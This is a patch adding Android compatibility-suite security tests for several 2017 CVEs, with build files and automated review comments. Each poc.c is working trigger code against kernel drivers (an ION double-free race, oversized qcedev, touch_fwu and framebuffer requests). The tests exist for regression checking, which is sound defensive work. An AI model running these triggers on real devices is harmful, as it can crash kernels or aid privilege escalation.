+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0564/local_poc.h b/hostsidetests/security/securityPatch/CVE-2017-0564/local_poc.h
new file mode 100644
index 0000000..6867562
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0564/local_poc.h
@@ -0,0 +1,80 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+/*
+ * Let any architecture override either of the following before
+ * including this file.
+ */
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+/*
+ * Direction bits, which any architecture can choose to override
+ * before including this file.
+ */
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
+
+
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+
+
+/* used to create numbers */
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+#endif
+
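Review bot: Nothing visible in this commit includes `local_poc.h`: the `poc.c` added beside it includes only system headers, and `LOCAL_SRC_FILES` lists just `poc.c`, so the file looks like dead weight. If it were included after `<sys/ioctl.h>`, the `_IOC`, `_IO`, `_IOR`, `_IOW` and `_IOWR` macros would be defined a second time and any difference from the libc definitions would produce redefinition warnings or different request numbers. The guard `__CMD_H__` uses a reserved double-underscore identifier and does not match the file name. Either delete the header or rename the guard (for example `LOCAL_POC_H`) and add a header comment saying why the libc macros are not used.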
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0564/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0564/poc.c
new file mode 100644
index 0000000..7734d4c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0564/poc.c
@@ -0,0 +1,221 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <stdio.h>
+#include <stdio.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <string.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <linux/ion.h>
+
+#define ION_HEAP(bit) (1 << (bit))
+
+enum ion_heap_ids {
+ INVALID_HEAP_ID = -1,
+ ION_CP_MM_HEAP_ID = 8,
+ ION_SECURE_HEAP_ID = 9,
+ ION_SECURE_DISPLAY_HEAP_ID = 10,
+ ION_CP_MFC_HEAP_ID = 12,
+ ION_CP_WB_HEAP_ID = 16, /* 8660 only */
+ ION_CAMERA_HEAP_ID = 20, /* 8660 only */
+ ION_SYSTEM_CONTIG_HEAP_ID = 21,
+ ION_ADSP_HEAP_ID = 22,
+ ION_PIL1_HEAP_ID = 23, /* Currently used for other PIL images */
+ ION_SF_HEAP_ID = 24,
+ ION_SYSTEM_HEAP_ID = 25,
+ ION_PIL2_HEAP_ID = 26, /* Currently used for modem firmware images */
+ ION_QSECOM_HEAP_ID = 27,
+ ION_AUDIO_HEAP_ID = 28,
+ ION_MM_FIRMWARE_HEAP_ID = 29,
+ ION_HEAP_ID_RESERVED = 31 /** Bit reserved for ION_FLAG_SECURE flag */
+};
+
+static unsigned int ion_type[] = {
+ ION_HEAP(ION_CP_MM_HEAP_ID),
+ ION_HEAP(ION_CP_MFC_HEAP_ID),
+ ION_HEAP(ION_SYSTEM_CONTIG_HEAP_ID),
+ ION_HEAP(ION_ADSP_HEAP_ID ),
+ ION_HEAP(ION_SF_HEAP_ID),
+ ION_HEAP(ION_SYSTEM_HEAP_ID),
+ ION_HEAP(ION_QSECOM_HEAP_ID),
+ ION_HEAP(ION_AUDIO_HEAP_ID),
+};
+
+#define NEW_ION
+int ion_alloc(int fd, int len, int *hdl, unsigned int ion_type)
+{
+ int ret;
+ struct ion_allocation_data req = {
+ .len = len,
+#ifdef NEW_ION
+ .heap_id_mask = ion_type,
+ //.flags = ION_SECURE | ION_FORCE_CONTIGUOUS,
+ .flags = (1 << 0),
+ .flags = 0x0,
+#else
+ .flags = ION_SECURE | ION_FORCE_CONTIGUOUS | ION_HEAP(ION_CP_MM_HEAP_ID),
+#endif
+ .align = len,
+ };
+
+ ret = ioctl(fd, ION_IOC_ALLOC, &req);
+ if (ret) {
+ return ret;
+ }
+
+ *hdl = req.handle;
+
+ return 0;
+}
+
+int ion_free(int fd, int hdl)
+{
+ int ret;
+ struct ion_handle_data req = {
+ .handle = hdl,
+ };
+
+ ret = ioctl(fd, ION_IOC_FREE, &req);
+ if (ret) {
+ return ret;
+ }
+
+ return 0;
+}
+
+int ion_map(int fd, int hdl)
+{
+ int ret;
+ struct ion_fd_data req = {
+ .handle = hdl,
+ };
+
+ ret = ioctl(fd, ION_IOC_MAP, &req);
+ if (ret) {
+ return ret;
+ }
+
+ return req.fd;
+}
+
+int ion_fd;
+int ion_handle;
+int status[2];
+int cmd = 0;
+
+void *threadForIonFree01()
+{
+ status[0] = 1;
+
+ while (cmd == 0) {
+ usleep(10);
+ }
+ if (cmd == -1)
+ goto failed;
+
+ usleep(50);
+ ion_free(ion_fd, ion_handle);
+
+failed:
+ status[0] = 2;
+ return NULL;
+}
+
+
+void *threadForIonFree02()
+{
+ status[1] = 1;
+
+ while (cmd == 0) {
+ usleep(10);
+ }
+ if(cmd == -1)
+ goto failed;
+
+ usleep(50);
+ ion_free(ion_fd, ion_handle);
+
+failed:
+ status[1] = 2;
+ return NULL;
+}
+
+int main()
+{
+ int ret, i, count;
+ pthread_t tid_free[2];
+
+ count = 0;
+retry:
+ status[0] = 0;
+ status[1] = 0;
+ cmd = 0;
+ ion_fd = open("/dev/ion", O_RDONLY| O_SYNC, 0);
+ if (ion_fd < 0) {
+ return -1;
+ }
+
+ for (i=0; i < sizeof(ion_type)/sizeof(ion_type[0]); i++) {
+ ret = ion_alloc(ion_fd, 0x1000, &ion_handle, ion_type[i]);
+ if (ret == 0) {
+ break;
+ }
+ }
+
+ if (i == sizeof(ion_type)/sizeof(ion_type[0])) {
+ goto failed;
+ }
+
+ ret = pthread_create(&tid_free[0], NULL, threadForIonFree01, NULL);
+ if (ret != 0) {
+ goto failed;
+ }
+
+ ret = pthread_create(&tid_free[1], NULL, threadForIonFree02, NULL);
+ if (ret != 0) {
+ cmd = -1;
+ goto failed;
+ }
+
+ while (status[0] != 1 || status[1] != 1) {
+ usleep(50);
+ }
+
+ cmd = 1;
+ ret = ion_map(ion_fd, ion_handle);
+
+ while (status[0] != 2 || status[1] != 2) {
+ usleep(50);
+ }
+
+failed:
+ ion_free(ion_fd,ion_handle);
+ close(ion_fd);
+ goto retry;
+
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0576/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0576/Android.mk
new file mode 100644
index 0000000..c62755c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0576/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0576
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0576/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0576/poc.c
new file mode 100644
index 0000000..f08a068
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0576/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <string.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <inttypes.h>
+#include <errno.h>
+
+#define QCEDEV_MAX_KEY_SIZE 64
+#define QCEDEV_MAX_IV_SIZE 32
+#define QCEDEV_MAX_BUFFERS 16
+
+struct buf_info {
+ union {
+ uint32_t offset;
+ uint8_t *vaddr;
+ };
+ uint32_t len;
+};
+
+struct qcedev_vbuf_info {
+ struct buf_info src[QCEDEV_MAX_BUFFERS];
+ struct buf_info dst[QCEDEV_MAX_BUFFERS];
+};
+
+struct qcedev_pmem_info {
+ int fd_src;
+ struct buf_info src[QCEDEV_MAX_BUFFERS];
+ int fd_dst;
+ struct buf_info dst[QCEDEV_MAX_BUFFERS];
+};
+
+enum qcedev_oper_enum {
+ QCEDEV_OPER_DEC = 0,
+ QCEDEV_OPER_ENC = 1,
+ QCEDEV_OPER_DEC_NO_KEY = 2,
+ QCEDEV_OPER_ENC_NO_KEY = 3,
+ QCEDEV_OPER_LAST
+};
+
+enum qcedev_cipher_alg_enum {
+ QCEDEV_ALG_DES = 0,
+ QCEDEV_ALG_3DES = 1,
+ QCEDEV_ALG_AES = 2,
+ QCEDEV_ALG_LAST
+};
+
+enum qcedev_cipher_mode_enum {
+ QCEDEV_AES_MODE_CBC = 0,
+ QCEDEV_AES_MODE_ECB = 1,
+ QCEDEV_AES_MODE_CTR = 2,
+ QCEDEV_AES_MODE_XTS = 3,
+ QCEDEV_AES_MODE_CCM = 4,
+ QCEDEV_DES_MODE_CBC = 5,
+ QCEDEV_DES_MODE_ECB = 6,
+ QCEDEV_AES_DES_MODE_LAST
+};
+
+struct qcedev_cipher_op_req {
+ uint8_t use_pmem;
+ union {
+ struct qcedev_pmem_info pmem;
+ struct qcedev_vbuf_info vbuf;
+ };
+ uint32_t entries;
+ uint32_t data_len;
+ uint8_t in_place_op;
+ uint8_t enckey[QCEDEV_MAX_KEY_SIZE];
+ uint32_t encklen;
+ uint8_t iv[QCEDEV_MAX_IV_SIZE];
+ uint32_t ivlen;
+ uint32_t byteoffset;
+ enum qcedev_cipher_alg_enum alg;
+ enum qcedev_cipher_mode_enum mode;
+ enum qcedev_oper_enum op;
+};
+
+#define QCEDEV_IOC_MAGIC 0x87
+
+#define QCEDEV_IOCTL_ENC_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 1, struct qcedev_cipher_op_req)
+#define QCEDEV_IOCTL_DEC_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 2, struct qcedev_cipher_op_req)
+
+void thread_func(int fd)
+{
+ struct qcedev_cipher_op_req req;
+ unsigned int i;
+ char *data;
+
+ memset(&req, 0, sizeof(struct qcedev_cipher_op_req));
+
+ data = mmap(NULL, 0xFFFFFF * 3, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
+ if (data == MAP_FAILED) {
+ exit(0);
+ }
+ for (i = 0; i < 0xFFFFFF * 3; i += sizeof(void*))
+ *((unsigned long long*)(data + i)) = 0xABADACC355001337;
+
+ req.in_place_op = 1;
+ req.entries = 2;
+ req.byteoffset = 15;
+ req.mode = QCEDEV_AES_MODE_CTR;
+
+ req.op = QCEDEV_OPER_ENC;
+ req.ivlen = 1;
+ req.data_len = 0xFFFFFFFE;
+ req.vbuf.src[0].len = 4;
+ req.vbuf.src[1].len = 0xFFFFFFFE - 4;
+ req.vbuf.src[0].vaddr = (uint8_t*)data;
+ req.vbuf.src[1].vaddr = (uint8_t*)data;
+ req.vbuf.dst[0].len = 4;
+ req.vbuf.dst[1].len = 0xFFFFFFFE - 4;
+ req.vbuf.dst[0].vaddr = (uint8_t*)data;
+ req.vbuf.dst[1].vaddr = (uint8_t*)data;
+
+ ioctl(fd, QCEDEV_IOCTL_ENC_REQ, &req);
+
+ exit(0);
+}
+
+int main(void)
+{
+ int fd;
+ const char *dev = "/dev/qce";
+
+ fd = open(dev, O_RDWR);
+ if (fd < 0) {
+ return EXIT_FAILURE;
+
+ }
+ thread_func(fd);
+
+ return EXIT_FAILURE;
+}
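Review bot: The fill loop in thread_func advances by `sizeof(void*)` but stores an `unsigned long long`, so in the 32-bit build (the module is built with LOCAL_MULTILIB := both) the final store starts at offset 0x2FFFFFC and runs past the end of the mapping, assuming 4 KiB pages. That can fault in user space before the ioctl under test is ever issued. I would bound and step the loop by the store width: `for (i = 0; i + sizeof(unsigned long long) <= 0xFFFFFF * 3; i += sizeof(unsigned long long))`. Separately, thread_func always ends in `exit(0)`, so the `return EXIT_FAILURE;` after the call in main is unreachable and the ioctl result is discarded. A short comment stating which outcome the host-side test keys on would help the next reader.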
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0577/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0577/Android.mk
new file mode 100644
index 0000000..0ef89c5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0577/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0577
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0577/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0577/poc.c
new file mode 100644
index 0000000..42455be
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0577/poc.c
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <asm/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <fcntl.h>
+
+int test_touch_fwu(){
+ char* dev_name = "/dev/touch_fwu";
+ int fd = open(dev_name, O_RDWR);
+
+ if (fd < 0) {
+ return -1;
+ }
+
+ size_t buf_len = 0xfffff;
+ char* buf = (char*) malloc(buf_len);
+ if (buf == NULL ) {
+ return -1;
+ }
+
+ int ret = 0;
+ ret = write(fd, buf, buf_len);
+ free(buf);
+ return ret;
+}
+
+int main()
+{
+ test_touch_fwu();
+ return 0;
+}
+
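Review bot: test_touch_fwu never closes `fd`, and the `buf == NULL` branch returns with the descriptor still open; add `close(fd);` before each return that follows a successful open. The buffer passed to write() is uninitialised heap memory, so the bytes handed to the driver differ from run to run; `char* buf = calloc(1, buf_len);` makes the test input deterministic. main ignores the return value, so a missing /dev/touch_fwu node and a completed write look identical to the caller. If that is intended, a one-line comment saying the verdict comes from the host side would make it clear.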
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0579/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0579/Android.mk
new file mode 100644
index 0000000..494b8c5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0579/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0579
+LOCAL_SRC_FILES := poc.c
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0579/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0579/poc.c
new file mode 100644
index 0000000..5bf4329
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0579/poc.c
@@ -0,0 +1,93 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <linux/fb.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define MSMFB_IOCTL_MAGIC 'm'
+#define MSMFB_CURSOR _IOW(MSMFB_IOCTL_MAGIC, 130, struct fb_cursor)
+
+int call_ioctl(int file_desc, unsigned long request, void* param)
+{
+ int ret_val;
+
+ ret_val = ioctl(file_desc, request, param);
+
+ if (ret_val < 0) {
+ return ret_val;
+ }
+ return ret_val;
+}
+
+int test_mdss_msm_fb(int file_desc)
+{
+ int ret_val;
+ unsigned char* buf = malloc(0x100);
+ struct fb_cursor cursor;
+
+ memset(&cursor, 0, sizeof(struct fb_cursor ));
+
+ cursor.set = FB_CUR_SETIMAGE;
+ cursor.enable = 1;
+ cursor.rop = 0;
+ cursor.mask = 0;
+ cursor.hot.x = 0x100;
+ cursor.hot.y = 0x100;
+ cursor.image.dx = 1439;
+ cursor.image.dy = 2559;
+ cursor.image.width = 0x1000;
+ cursor.image.height = 0x1000;
+ cursor.image.fg_color = 0xff;
+ cursor.image.bg_color = 0xff00;
+ cursor.image.depth = 32;
+ cursor.image.data = malloc(cursor.image.width * cursor.image.height * 0x4 );
+
+ ret_val = call_ioctl(file_desc, MSMFB_CURSOR, &cursor );
+ if(ret_val < 0) {
+ return ret_val;
+ }
+
+ free((void *)cursor.image.data);
+ free(buf);
+
+ return ret_val;
+}
+
+int main()
+{
+ int file_desc, ret_val;
+ const char* DEVICE_FILE_NAME = "/dev/graphics/fb0";
+
+ file_desc = open(DEVICE_FILE_NAME, 0);
+ if (file_desc < 0) {
+ return -1;
+ }
+
+ test_mdss_msm_fb(file_desc);
+
+ close(file_desc);
+
+ return 0;
+}
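Review bot: In test_mdss_msm_fb the early `return ret_val;` after call_ioctl skips both free() calls, so the 64 MiB image buffer and `buf` are leaked whenever the driver rejects the request, which is presumably the normal outcome on a patched kernel. The `if(ret_val < 0) { return ret_val; }` block can simply be removed, because the function returns ret_val after the frees anyway. The large malloc for `cursor.image.data` is also unchecked; I would add `if (cursor.image.data == NULL) { free(buf); return -1; }` so an allocation failure is not mistaken for a driver response. `buf` is never used, and the `if (ret_val < 0)` branch in call_ioctl returns the same value as the fall-through, so both could be dropped.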
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0580/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0580/Android.mk
new file mode 100644
index 0000000..6350b07
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0580/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0580
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0580/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0580/poc.c
new file mode 100644
index 0000000..0cf518a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0580/poc.c
@@ -0,0 +1,105 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <errno.h>
+#include <asm/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <fcntl.h>
+
+struct firmware {
+ size_t size;
+ const uint8_t *data;
+ void **pages;
+ void *priv;
+};
+
+#define TOUCH_FWU_IOCTL_CODE (0x81)
+#define FW_UPDATE_PROCCESS _IO(TOUCH_FWU_IOCTL_CODE, 1)
+#define FW_FILE_SIZE _IOW(TOUCH_FWU_IOCTL_CODE, 2, uint32_t)
+#define FW_FILE_REQUEST _IO(TOUCH_FWU_IOCTL_CODE, 3)
+#define FW_LOAD_DONE _IO(TOUCH_FWU_IOCTL_CODE, 4)
+#define FW_UPDATE_BYPASS _IO(TOUCH_FWU_IOCTL_CODE, 5)
+
+void ioctl_modify_size_big(){
+ char* dev_name = "/dev/touch_fwu";
+ int fd = open(dev_name,O_RDWR);
+ if (fd < 0){
+ return ;
+ }
+
+ int cout = 1;
+ while(cout){
+ ioctl(fd, FW_FILE_SIZE , 0xffff );
+ ioctl(fd, FW_LOAD_DONE , 0);
+ }
+}
+
+void ioctl_modify_size_small(){
+ char* dev_name = "/dev/touch_fwu";
+ int fd = open(dev_name,O_RDWR);
+ if (fd < 0){
+ return ;
+ }
+
+ int cout = 1;
+ while(cout){
+ ioctl(fd, FW_FILE_SIZE , 0xf );
+ ioctl(fd, FW_LOAD_DONE , 0);
+ }
+}
+
+void ioctl_FW_UPDATE_PROCCESS(){
+ char* dev_name = "/dev/touch_fwu";
+ int fd = open(dev_name,O_RDWR);
+ if (fd < 0){
+ return ;
+ }
+
+ int cout = 1;
+ while(cout){
+ ioctl(fd, FW_UPDATE_PROCCESS , 0);
+ }
+}
+
+
+int main()
+{
+ pid_t pid = fork();
+ if (pid < 0) {
+ return -1;
+ }
+
+ if (0 == pid) {
+ ioctl_modify_size_big();
+ }
+ else {
+ pid_t pid1 = fork();
+ if (0 == pid1) {
+ ioctl_modify_size_small();
+ }
+ else {
+ ioctl_FW_UPDATE_PROCCESS();
+ }
+ }
+
+ return 0;
+}
